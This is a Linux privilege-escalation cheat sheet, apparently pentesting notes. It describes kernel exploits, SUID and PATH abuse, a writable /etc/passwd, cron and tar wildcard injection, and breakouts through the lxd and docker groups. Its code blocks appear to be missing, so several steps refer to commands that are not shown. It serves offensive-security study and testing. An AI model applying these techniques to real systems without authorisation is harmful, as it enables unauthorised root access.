Linux Privesc
Privilege Escalation usually involves going from a lower permission to a higher permission.
Enumeration Scripts:
There are some scripts that could help us in order to escalate privilege on Linux systems. These are two examples:
Kernel Vulnerabilities
We can exploit some kernel vulnerabilities in order to privesc. linux-exploit-suggester.sh
is an amazing script that do this work.
Compiling Exploits
Sometimes we need to compile our exploits in order to get the binary or executable.
For 64-bits:
For 32-bits:
Finally we just need to give execution permissions.
eBPF_verifier - Linux Kernel < 4.13.9
DirtyC0w - Linux Kernel 2.6.22 < 3.9
Transfer the exploit to the target machine.
Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
Abusing SUID/GUID Files
Check for files with the SUID/GUID bit set. This means that the file or files can be run with permissions of the file(s) owner/group. In case of super-user, we can leverage this to get a shell with these privileges.
But when a special permission is given to each user it becomes SUID or SGID. When a extra bit "4" is set to user (Owner) it becomes SUID (Set user ID) and wen bit "2" is set to group it becomes SGID (Set Group ID).
SUID: rws-rwx-rws
GUID: rwx-rws-rwx
Permission | On Files | On Directories |
SUID Bit | User executes the file with permissions of the file owner. | - |
SGID Bit | User executes the file with the permission of the group owner. | File created in directory gets the same group owner. |
Sticky Bit | - | Users are prevented from deleting files from others users. |
Finding SUID / GUID Binaries:
Exploiting PATH Variable
PATH
is an environmental variable in Linux and Unix-like operating systems which specifies directories that hold executable programs. When the user runs any command in the terminal, it searches for executable files with the help of the PATH
Variable in response to commands executed by a user.
How does this let us escalate privileges?
Let's say we need an SUID binary. Running it, we can see that itโs calling the system shell to do a basic process like list processes with "ps". We can rewrite the PATH
variable to a location of our choice. So when the SUID binary calls the system shell to run an executable, it runs one that we have written instead. So we need to change the PATH
variable:
And create a file with execution permissions with the same binary name:
Finally when the SUID files calls ps
function, instead of showing system processes will execute our command.
Remember: To exploit PATH variable we need a SUID File to gain privileges otherwise it will be executed as normal user.
Writeable Folders
We can elevate our privileges some times when we have write permissions in some specific directories.
Note: With write permissions on the folder we can create/delete/move files but not modify them.
On PATH variable
When we can write on folders such as /usr/local/bin
/usr/bin
or some others that are included on the PATH variable we can escalate our privileges by modifying or creating a new binary that will be executed as root.
SSH port open
When we ssh a machine root executes run-parts
binary so we add a malicious binary on the path. Look Executing files with root to see which binary we can fit our needs.
Abusing Wildcards (*)
Tar Argument Injection in root cronjob
Imagine you compromise a low-level user on a system and you figure out this command is running as root:
We want to go with sudoers file as we are lazy and just sudo bash, so let's see....
Writeable /etc/passwd
The /etc/passwd
file stores essential information, which is required during login. In other words, it stores user account information.
if we have a writable /etc/passwd
file, we can write a new line entry allowing us to log in as our own root user. But first, we need to create a compliant password hash.
Finally append the following string to /etc/passwd
file:
And finally su to this new user to obtain a root shell:
GTFOBins
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
Firstly, we need to check the sudo permissions on binaries:
After that search on GTOBins web to search how to escape from that binary and obtain a shell:
Remember: Do not forget to run the command as sudo!
SETENV permission
This mean that we can set some environment variables to run the command.
Search for a library, create a copy in /tmp
and execute commands.
We can create a sys.py file on /tmp
.
Finally open the backdoor.
Snap install
When we find the following, we can install any malicious packet, so we will add our malicious personal crafted snap packet.
We need to create a malicious snap/hooks/install
file, and modify snap/snapcraft.yaml
Linux Capabilities
Linux capabilities provide a subset of the available root privileges to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation.
Check the following link to see what means each capability:
Note: ep
capability means that can read and write any file on the filesystem.
More info in:
Exploiting Crontab
The Cron
daemon is a long-running process that executes commands at specific dates and times. You can use this to schedule activities, either as on-time events or as recurring tasks.
To view what cronjobs are active we need to cat the /etc/crontab
file:
If we find a script that is scheduled to run as user root and we can write to this file, we can modify it to get a reverse shell when the cronjob run the task.
Abusing privileges (Group memberships)
sudo
Thats it, you're already root:
lxd
A member of the local โlxdโ group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.
With Internet
Without Internet
Build an Alpine image and start it using the flag security.privileged=true
, forcing the container to interact as root with the host filesystem.
Also you can download directly the image from ubuntu:
adm
All members of the group admin
have access to logs files:
disk
All members of the gorup disk
have full access to the filesystem.
We can also write files on the filesystem.
Hint: Files owned by root are now writable such as /etc/passwd
or /etc/shadow
.
video
The video group has access to view the screen output of all opened sessions (tty). With w
command we can see the who is logged on the server:
So we need to grab the video output and graphics configuration.
Finally we can open the data with GIMP.
docker
Since we are member of docker group, we can mount the root filesystem of the host machine to an instance's volume.
We can also mount the filesystem and the network access.
Docker Breakout
Privileged Flag enabled
When we start a docker with the privileged flag --privileged
, we give the sufficient permission to mount the host filesystem inside the docker.
When the root
user is owned, we will search the host drive:
After finding the Linux sda we will mount it:
Finally, just cd
to out new mount point to find all host files.
Docker.sock available
By default, when the docker
command is executed on a host, an API call to the docker daemon is made via a non-networked UNIX socket located at /var/run/docker.sock
. However, many containers and guides require you to expose this socket file as a volume within a container or in some cases, expose it on a TCP port. Docker containers that expose /var/run/docker.sock
, locally or remotely, could lead to a full environment take over.
Check if socket is available
List all containers
Create an exec
Start the exec
USBCreator D-Bus
A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root โ without supplying a password.
Executing files with root
Adding a new SUDOER user (Bash)
We can create a new user and add it to the sudoers file:
Creating a SUID shell (bash)
We can copy the bash file to temp and give it SUID permissions.
Creating a SUID file (c)
Creating a SUID shell (C)
We can write the following C code in order to obtain a bash shell:
We just need to compile and give SUID permissions from root in our attacking machine.
Finally we need to transfer the file with the command execution.
Capabilities
Capabilities are those permissions that divide the privileges of kernel user or kernel level programs into small pieces so that a process can be allowed sufficient power to perform specific privileged tasks.
Search files with capabilities:
Python Capability
References:
Last updated